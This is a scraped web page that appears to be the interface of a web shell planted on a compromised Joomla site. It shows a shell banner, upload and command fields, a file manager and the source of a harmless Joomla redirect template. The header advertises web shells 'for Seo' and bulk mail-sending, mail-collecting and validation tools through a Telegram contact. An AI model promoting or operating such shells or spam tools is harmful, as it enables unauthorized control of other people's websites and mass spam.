__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * @package     Joomla.Administrator
 * @subpackage  com_redirect
 *
 * @copyright   (C) 2009 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

use Joomla\CMS\Language\Text;

?>

<div class="accordion d-none d-sm-block" id="accordion1">
    <div class="accordion-heading pb-3">
        <button class="btn btn-primary" type="button" data-bs-toggle="collapse" data-bs-target="#batch" aria-expanded="false" aria-controls="batch">
            <?php echo Text::_('COM_REDIRECT_BATCH_UPDATE_WITH_NEW_URL'); ?>
        </button>
    </div>
    <div class="collapse card" id="batch">
        <div class="card-body">
            <fieldset>
                <div class="control-group">
                    <div class="control-label">
                        <label id="new_url-lbl" for="new_url">
                            <?php echo Text::_('COM_REDIRECT_FIELD_NEW_URL_LABEL'); ?>
                        </label>
                    </div>
                    <div class="controls">
                        <input class="form-control" type="text" name="new_url" id="new_url" value="" size="50">
                        <small id="new_url-desc" class="form-text">
                            <?php echo Text::_('COM_REDIRECT_FIELD_NEW_URL_DESC'); ?>
                        </small>
                    </div>
                </div>
                <div class="control-group">
                    <div class="control-label">
                        <label id="comment-lbl" for="comment">
                            <?php echo Text::_('COM_REDIRECT_FIELD_COMMENT_LABEL'); ?>
                        </label>
                    </div>
                    <div class="controls">
                        <input class="form-control" type="text" name="comment" id="comment" value="" size="50">
                    </div>
                </div>
                <button class="btn btn-primary" type="button" onclick="this.form.task.value='links.duplicateUrls';this.form.submit();">
                    <?php echo Text::_('COM_REDIRECT_BUTTON_UPDATE_LINKS'); ?>
                </button>
            </fieldset>
        </div>
    </div>
</div>


Filemanager

Name Type Size Permission Actions
default.php File 9.29 KB 0664
default.xml File 172 B 0664
default_addform.php File 2.2 KB 0664
default_batch_body.php File 853 B 0664
default_batch_footer.php File 648 B 0664
emptystate.php File 2.95 KB 0664
Filemanager